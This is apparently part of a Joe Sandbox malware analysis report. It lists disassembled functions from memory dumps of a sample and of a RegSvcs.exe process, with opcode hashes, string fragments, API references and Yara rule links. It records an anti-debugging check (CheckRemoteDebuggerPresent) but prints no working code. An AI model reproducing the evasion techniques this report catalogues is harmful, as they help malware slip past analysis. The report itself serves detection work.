Instruction ID: 7054a46de8e0c24256096595564f41f7d3d2165fd1fd73ae3a35086ce5e13300
Opcode Fuzzy Hash: 3f1bec34df3d6a77b612d107329c21b6607ec78e39975c45f1347306c7b34be1
Instruction Fuzzy Hash: 55F0DAB0D5420ADFDB54DFA9C845AAEBFF4BB48210F1085A9E918E7301D77096458F91

Uniqueness

Uniqueness Score: -1.00%

Function 07C40B78 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689757039.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3824a504bba8604efac86bed2b850fe679183d49b7fdcbb228dbef7fc84c43da
Instruction ID: 49cc14cf1fcc2a62988cd4e364d370f31a678d827b647bdf80e8e4cdf975260e
Opcode Fuzzy Hash: 3824a504bba8604efac86bed2b850fe679183d49b7fdcbb228dbef7fc84c43da
Instruction Fuzzy Hash: F6E0B6B0D40209DFD740EFB9C945B5EBFF0BF08604F1185A9D519E7212E77496458F91

Uniqueness

Uniqueness Score: -1.00%

Function 07C40C70 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689757039.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 864c98456f65e9c9d679e235722583fd8cb717aeae7f99936614c413046d5e85
Instruction ID: 83d5d85e7817a0d013f513d159869c5ee22bd1dc79612ed09871dfca54493d72
Opcode Fuzzy Hash: 864c98456f65e9c9d679e235722583fd8cb717aeae7f99936614c413046d5e85
Instruction Fuzzy Hash: A4D0127314010C9E9B41EE94E844D5277DCBB18600B408462E508CB021E621E674EB62

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 07B53810 Relevance: 5.3, Strings: 4, Instructions: 259COMMON

Download Yara Rule

Strings

T+-q, xrefs: 07B53B4A
]\`, xrefs: 07B53A92
[V~*, xrefs: 07B53975
[V~*, xrefs: 07B5397C

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: T+-q$[V~*$[V~*$]\`
API String ID: 0-1849991408
Opcode ID: bd8c701923142229efc0e276ae1fd60fc56381c57e171e9b53bff110e0723105
Instruction ID: 5637a604b038e1593995a8189274ef8c4a934ae6ff646416ec23720a4a0c7367
Opcode Fuzzy Hash: bd8c701923142229efc0e276ae1fd60fc56381c57e171e9b53bff110e0723105
Instruction Fuzzy Hash: B0B106B0E1521ADBDB08CFAAD98499EFBF2BF89340F14D56AD815AB318D33499018F54

Uniqueness

Uniqueness Score: -1.00%

Function 07B53767 Relevance: 4.1, Strings: 3, Instructions: 313COMMON

Download Yara Rule

Strings

T+-q, xrefs: 07B53B4A
]\`, xrefs: 07B53A92
[V~*, xrefs: 07B5397C

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: T+-q$[V~*$]\`
API String ID: 0-3978741314
Opcode ID: 31e5416c9d1f334cc6daae88cbdfceea88864f57ad358ea7b4ef2dec7c75aadd
Instruction ID: f84d604d290eb01d6f391a95eddda4bf067796c951abc8174dbc30ca4242fae4
Opcode Fuzzy Hash: 31e5416c9d1f334cc6daae88cbdfceea88864f57ad358ea7b4ef2dec7c75aadd
Instruction Fuzzy Hash: C4C168B0E1520ADBDB08CFAAD88499EFBF2FF89344F14D56AE815AB314D73499018F54

Uniqueness

Uniqueness Score: -1.00%

Function 07B53800 Relevance: 4.0, Strings: 3, Instructions: 259COMMON

Download Yara Rule

Strings

T+-q, xrefs: 07B53B4A
]\`, xrefs: 07B53A92
[V~*, xrefs: 07B5397C

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: T+-q$[V~*$]\`
API String ID: 0-3978741314
Opcode ID: a222119b4effd47b91a5b37a73551783318ed1365812f0f7f85f49bcf2eeb4e2
Instruction ID: 71accc7971bd733aa84f522046b5c3d9507f4867185e9913a1f990d11848d500
Opcode Fuzzy Hash: a222119b4effd47b91a5b37a73551783318ed1365812f0f7f85f49bcf2eeb4e2
Instruction Fuzzy Hash: DFB127B0E1521ADBDB08CFAAD98499EFBF2BF89340F14D56AD815AB314D33499018F54

Uniqueness

Uniqueness Score: -1.00%

Function 07B5A20B Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08c0468633bdad4d943c9b35bf919c8bb036eddec35936fb40386fc1a174360c
Instruction ID: c7c10edd9205fb4d6db8856e6d002177abdc1fb7f57a56743a0a17c043215f50
Opcode Fuzzy Hash: 08c0468633bdad4d943c9b35bf919c8bb036eddec35936fb40386fc1a174360c
Instruction Fuzzy Hash: 67E1F9B4E002198FDB14CF99D584AAEBBB2FF89305F24D2A9D814A7355D734A941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 07B5A643 Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a94f392bbfef714e2e3b28fa9f5fc1083d7aec4de17fa5179f49d79276b0920d
Instruction ID: 53b1ca4b20df66c0aae8a14df027f0ab73e5ad6afa0614c86b4ba2b59bd03666
Opcode Fuzzy Hash: a94f392bbfef714e2e3b28fa9f5fc1083d7aec4de17fa5179f49d79276b0920d
Instruction Fuzzy Hash: 62E1FCB4E001198FDB14CFA9D584AAEBBB2FF89305F24D2A9D814A7355D734AD41CF60

Uniqueness

Uniqueness Score: -1.00%

Function 07B5AA78 Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cbe7a01060c4b6ef427b846b9e432a96200ef2d5829c2ea8f12132e1ce53c5f
Instruction ID: 4d77fd79665175b945d7ef996d2aff6316e92947e1b0d004693b0f65b1ed37a8
Opcode Fuzzy Hash: 8cbe7a01060c4b6ef427b846b9e432a96200ef2d5829c2ea8f12132e1ce53c5f
Instruction Fuzzy Hash: 34E1E9B4E002198FDB14DF99D580AAEFBB2FF89305F24D2A9E814A7355D734A941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 07B5C6B8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c41fc802cd4d923fd3cf6ce878ae6d60204006e84c95944ef31f3d27272afd61
Instruction ID: b0cc8682c202429ba4cca33991d27825e6adcbf7a3fcba4f9cfec547dd2febd8
Opcode Fuzzy Hash: c41fc802cd4d923fd3cf6ce878ae6d60204006e84c95944ef31f3d27272afd61
Instruction Fuzzy Hash: 38E1FDB4E0021A8FDB14DF99D584AAEFBB2FF89305F2491A9D814A7356D730AD41CF60

Uniqueness

Uniqueness Score: -1.00%

Function 07B5C280 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 108028cc1c7538541ad0d6cac559f859c91db91ac6840fc55692b49b46ab2309
Instruction ID: 3ff4dedd30cb892ea4ef3b902bfc51ac66330f43573a62d2881cce9f6a55bafb
Opcode Fuzzy Hash: 108028cc1c7538541ad0d6cac559f859c91db91ac6840fc55692b49b46ab2309
Instruction Fuzzy Hash: 25E1EBB4E0021A8FDB14CF99D580AAEBBB2FF89305F2491A9D814A7355D731AD41CF64

Uniqueness

Uniqueness Score: -1.00%

Function 07B52117 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25b4db03aabe1dceb2effabe0fe479f6ea8b4bd2402a7bab00f110765d33054b
Instruction ID: 2bd1c6fb1d28f4116ef355c60f0a25348ecae4f3b575c3f21a2663b911e31f8e
Opcode Fuzzy Hash: 25b4db03aabe1dceb2effabe0fe479f6ea8b4bd2402a7bab00f110765d33054b
Instruction Fuzzy Hash: 9DD1373192075A9ACB11EB68D994A9DF771FF96300F10C7AAD0493B225EB706AC5CF90

Uniqueness

Uniqueness Score: -1.00%

Function 07B52141 Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24909a4205959a52ae2aed891282efee02e8a3fda3e5e752c66ce662142b8d63
Instruction ID: 9e85a402b0a9f62d5b2bd63da3d473d16986a1050fba9b40c236a52e3f0402a0
Opcode Fuzzy Hash: 24909a4205959a52ae2aed891282efee02e8a3fda3e5e752c66ce662142b8d63
Instruction Fuzzy Hash: 8BD1273192071B9ACB11EB64D994A9DF371FF96300F10C7AAD0493B225EB706AC5CF91

Uniqueness

Uniqueness Score: -1.00%

Function 017DE3B4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684997542.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 488e0064dee09adb09467c6a26c9f2ee42fb1fe1429e0f43232dcf3f632c714d
Instruction ID: a8a0f240a9b295d6e62b6059594960a4e1e77e1d5472e42ee8ec23fe36657b53
Opcode Fuzzy Hash: 488e0064dee09adb09467c6a26c9f2ee42fb1fe1429e0f43232dcf3f632c714d
Instruction Fuzzy Hash: 06A16232E002198FCF06DFB4C54459EFBB2FF85300B15856AE906AF255DB71E956CB90

Uniqueness

Uniqueness Score: -1.00%

Function 07B52150 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd0848b5738f47cb9577d4b5556b69208bb9f1c9ce92add0ca7c492d1784844c
Instruction ID: 32533ed50e34c233cc168fa90ad729a8f44481b1a8b9cb72ba05f24e59a04040
Opcode Fuzzy Hash: bd0848b5738f47cb9577d4b5556b69208bb9f1c9ce92add0ca7c492d1784844c
Instruction Fuzzy Hash: 90D10731D2075A9ACB11EB64D994A9DF371FF96300F10C7AAD0493B225EB706AC5CF91

Uniqueness

Uniqueness Score: -1.00%

Function 07B596E0 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8353b03b70ace3b0a08b5d6103e3d6d8043bf429cc395902993e96747492b79e
Instruction ID: 8e0744d50b3887e09de7041f825bb51801f7cd78bf69408e8e578a79a60900d2
Opcode Fuzzy Hash: 8353b03b70ace3b0a08b5d6103e3d6d8043bf429cc395902993e96747492b79e
Instruction Fuzzy Hash: 3751E6B4E19209DFEB08CF9AD5446EEFBFAEF8A300F149066E819A7211D7346941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 07B5C27B Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be7d6df57bac95af4cc7dd35dc17fadc4d60e85e7a318090796bd128b2775053
Instruction ID: 4112f47d3af75034cab11889778857f6dabc362406fa78a07b8cf6ad92662705
Opcode Fuzzy Hash: be7d6df57bac95af4cc7dd35dc17fadc4d60e85e7a318090796bd128b2775053
Instruction Fuzzy Hash: 2A51FAB4E0021A8BDB14CFA9D5845AEBBF3FF89305F24D1A9D818A7315D7319942CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0570F251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000005), ref: 0570F2AE
GetSystemMetrics.USER32(00000006), ref: 0570F2E8

Strings

g.D, xrefs: 0570F277

Memory Dump Source

Source File: 00000000.00000002.1688060136.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5700000_SecuriteInfo.jbxd

Similarity

API ID: MetricsSystem
String ID: g.D
API String ID: 4116985748-477188214
Opcode ID: edd1f19e51bf8818c5c13db104b83e58dcc0fe2f1f7e8e4a9507ad30de27e141
Instruction ID: 46fcb22aca0430e67274d6336caaa374dd3daa68b0e1671968eefd526ce5d3a9
Opcode Fuzzy Hash: edd1f19e51bf8818c5c13db104b83e58dcc0fe2f1f7e8e4a9507ad30de27e141
Instruction Fuzzy Hash: C42187B1804348CFCB20DF99D449B9EFFF0AB09324F20805AD459A7381C7749588CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0570F260 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000005), ref: 0570F2AE
GetSystemMetrics.USER32(00000006), ref: 0570F2E8

Strings

g.D, xrefs: 0570F277

Memory Dump Source

Source File: 00000000.00000002.1688060136.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5700000_SecuriteInfo.jbxd

Similarity

API ID: MetricsSystem
String ID: g.D
API String ID: 4116985748-477188214
Opcode ID: 43b5f24db1924d00597adaa5236248f798ee646df19f132cf0d0b3efe3bf7b19
Instruction ID: a08e672a9bee35840aca8a60516f0f200470ccef674d1236027f327557b34bc2
Opcode Fuzzy Hash: 43b5f24db1924d00597adaa5236248f798ee646df19f132cf0d0b3efe3bf7b19
Instruction Fuzzy Hash: C22134B4804748CFDB20DF99C449B9EFFF4AB08328F20841AD459A7290C374A988CFA5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegSvcs.exePID: 7404, Parent PID: 7256COMMON

Execution Graph

Execution Coverage:	11.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	100%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 067066D8 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06706DFB
$^q, xrefs: 06706DE3
$^q, xrefs: 06706DAE
$^q, xrefs: 06706DD7
$^q, xrefs: 06706DBA
$^q, xrefs: 06706E07

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 1562ed44075344747bc09c12bd429ba865f1afc40059ba9226c6a037edcf26a3
Instruction ID: e5bdd54ca492a3c97afa31cd5893b65986f1b4f6537146d36eef76be4eb8a14d
Opcode Fuzzy Hash: 1562ed44075344747bc09c12bd429ba865f1afc40059ba9226c6a037edcf26a3
Instruction Fuzzy Hash: 93321031E1071ACFDB14EF74D95459DB7F6BFC9300F2086AAD409AB264EB30A985CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0670B3C0 Relevance: 3.0, Strings: 2, Instructions: 483
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0670B709
$^q, xrefs: 0670B6FD

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 386b1535e3758a515d25c7ae8ee58c10645f8d2c9396a747436d3be8901242f6
Instruction ID: bdd4e149c8ce209d06ba9a8295f759c3db52a20c37e90144bdf116b553b81c95
Opcode Fuzzy Hash: 386b1535e3758a515d25c7ae8ee58c10645f8d2c9396a747436d3be8901242f6
Instruction Fuzzy Hash: 9F02B030B00205DFEB54DB74D590A6EB7E2EF84704F148529D40ADB795EB32EE86CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06700A0A Relevance: 2.8, Instructions: 2827COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22b7e1983b0cc95ceba0bf123c5ea6a1ea42782ce7623fccbf1118c3f6f4c859
Instruction ID: 810f2f6ca2a95bb79ddf8779af608cbb4ac65c96552f27460fe957f841454c3f
Opcode Fuzzy Hash: 22b7e1983b0cc95ceba0bf123c5ea6a1ea42782ce7623fccbf1118c3f6f4c859
Instruction Fuzzy Hash: 6A63E931D10B1A8ADB11EF68C8945A9F7B1FF99300F15D79AE45877221EB70AAC4CF81

Uniqueness

Uniqueness Score: -1.00%

Function 067033D0 Relevance: 2.2, Instructions: 2241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3962dfc006a34eed05f0516f85209d08a08cf466ff7b5eed4f326dee9585e53
Instruction ID: d21becb41ef97baafcc7ff27d6e2837cb9bb4f56f2918bee50020201b563ba77
Opcode Fuzzy Hash: e3962dfc006a34eed05f0516f85209d08a08cf466ff7b5eed4f326dee9585e53
Instruction Fuzzy Hash: 31331D31D1071ACEDB11EF68C8805ADF7B1FF99300F15C69AE458A7261EB70AAC5CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E57EC8 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00E57F3F

Memory Dump Source

Source File: 00000002.00000002.4134463929.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_RegSvcs.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 70b3fcbded1e7e1b14d1dfa60a3be24415ae3b09a36e76ab5fb40502a4f30a44
Instruction ID: 253f48815f1f837bc8b3245b2081221dec1eb3b8298516a9c36d3440c1638489
Opcode Fuzzy Hash: 70b3fcbded1e7e1b14d1dfa60a3be24415ae3b09a36e76ab5fb40502a4f30a44
Instruction Fuzzy Hash: 1A2125B29002598FCB10CF9AD484BEEBBF4AF49320F14846AE859A7250D778A944CF65

Uniqueness

Uniqueness Score: -1.00%

Function 067059E0 Relevance: 1.0, Instructions: 1015COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b3b475bbe386babc02bdf61c2e4dd63e509278b2454a0cdafc208b44cec15e4
Instruction ID: 1c06113c155cd67030c5a0f9c672b9b509cb7430bf6c3658401d389cfbbe2da9
Opcode Fuzzy Hash: 2b3b475bbe386babc02bdf61c2e4dd63e509278b2454a0cdafc208b44cec15e4
Instruction Fuzzy Hash: D4924734A00204CFEB64DB68C694A6DB7F2FF45314F5584AAD449AB3A1DB35EC85CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 06708810 Relevance: .6, Instructions: 594COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e318ae0089a58bfba123cff5801cd85a0f45e25808ebffe7bd421646053c6d3
Instruction ID: ad1bdd75a4207575b05d65c2224620c224467103812c2c3aaffd74bb430fca28
Opcode Fuzzy Hash: 5e318ae0089a58bfba123cff5801cd85a0f45e25808ebffe7bd421646053c6d3
Instruction Fuzzy Hash: 9112D171F10205DBEF64DB64D8806BEB7E6EB85310F248429D85ADB385DB34DC46CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0670E868 Relevance: .6, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7698b1957f1a5ad6edb00c8a8f01210f7bc0e41a2b34653e3a6d14534dd76197
Instruction ID: aa1085cd82498a40aa2c0d42b6aaddc09942e28c8596c5be3fb94c91cfd4a5af
Opcode Fuzzy Hash: 7698b1957f1a5ad6edb00c8a8f01210f7bc0e41a2b34653e3a6d14534dd76197
Instruction Fuzzy Hash: FD225E30E10209CFEFA4DB68D5807BEB7E6EB85310F248826E409DB3D5CA35DC858B61

Uniqueness

Uniqueness Score: -1.00%

Function 0670E310 Relevance: 10.4, Strings: 8, Instructions: 390
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0670E4E8
$^q, xrefs: 0670E4DC
$^q, xrefs: 0670E484
$^q, xrefs: 0670E490
$^q, xrefs: 0670E43D
$^q, xrefs: 0670E4B3
$^q, xrefs: 0670E4BF
$^q, xrefs: 0670E431

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: 30cec69e018d3c7bd3df304a7cd1f551eb961a7eafbb47ade5864643c0c0eb43
Instruction ID: 770658f831f6c99c7e951d6768e0502806b962b36f2868ab275051074e6d5b09
Opcode Fuzzy Hash: 30cec69e018d3c7bd3df304a7cd1f551eb961a7eafbb47ade5864643c0c0eb43
Instruction Fuzzy Hash: E2E16F34E10209CFEB65DF68D5946AEB7F2FB85304F148929E405EB395DB30D886CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0670EC88 Relevance: 8.0, Strings: 6, Instructions: 474COMMON

Download Yara Rule

Strings

$^q, xrefs: 0670F1BB
$^q, xrefs: 0670F223
$^q, xrefs: 0670F22F
$^q, xrefs: 0670F1EF
$^q, xrefs: 0670F1FB
$^q, xrefs: 0670F1C7

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 20947532c7827d7b07c251919506a39ec69ca4dd19d980717ddaf8351295d6f9
Instruction ID: 5f4fbb84cddaaefa5d983e3637ff62c9b4598025547d16f17243f9a3c3bb4a2d
Opcode Fuzzy Hash: 20947532c7827d7b07c251919506a39ec69ca4dd19d980717ddaf8351295d6f9
Instruction Fuzzy Hash: 86026D30E10209CFEBA4DF68D9846ADB7F1FB85314F248926E805DB395DB35D885CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0670C790 Relevance: 5.2, Strings: 4, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0670C80C
$^q, xrefs: 0670C83B
$^q, xrefs: 0670C800
$^q, xrefs: 0670C847

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 62a6076bcf16544e48a50640b5242c334b0ba7358e7a595b9077a822a2604b39
Instruction ID: 6097211bee6138c916b57722d7ef67f459feda6ff518f9c8dc55983fc0abe8b7
Opcode Fuzzy Hash: 62a6076bcf16544e48a50640b5242c334b0ba7358e7a595b9077a822a2604b39
Instruction Fuzzy Hash: 6A917130F0020A9FDB55DB65D9507AEB7F6AFC5204F10856AC40DEB788EE70DC468B95

Uniqueness

Uniqueness Score: -1.00%

Function 06707DD8 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Ocq, xrefs: 06707F8F
XPcq, xrefs: 06707F05
fcq, xrefs: 067084E5

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID: fcq$XPcq$\Ocq
API String ID: 0-3575482020
Opcode ID: b950592ec1e1edcf970422d113d691fcf762e181d388228ffc209256ed9da301
Instruction ID: d2b9024c10c516bb59e949099f89469bcc72dab8213fdb71e51e9c43bef7bb9b
Opcode Fuzzy Hash: b950592ec1e1edcf970422d113d691fcf762e181d388228ffc209256ed9da301
Instruction Fuzzy Hash: 7F618034F002089FEF549FA4C8547AEBAF6EB88300F20842AE506EB395DB759D459B65

Uniqueness

Uniqueness Score: -1.00%

Function 0670C781 Relevance: 2.7, Strings: 2, Instructions: 174
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0670C83B
$^q, xrefs: 0670C800

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 9142955dc90a300ee468a627ce29ad7cb3e004347d54bc2e5ad2b1813464645d
Instruction ID: 473811bbc97fd43bbf72aff8d11526e73ff9370f09a597d51220f28a10e30d79
Opcode Fuzzy Hash: 9142955dc90a300ee468a627ce29ad7cb3e004347d54bc2e5ad2b1813464645d
Instruction Fuzzy Hash: B4518430B001059FEB55DB65DA507BEB7F6EBC8648F10856AC409DB788EE70DC428BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00E57EC2 Relevance: 1.6, APIs: 1, Instructions: 68
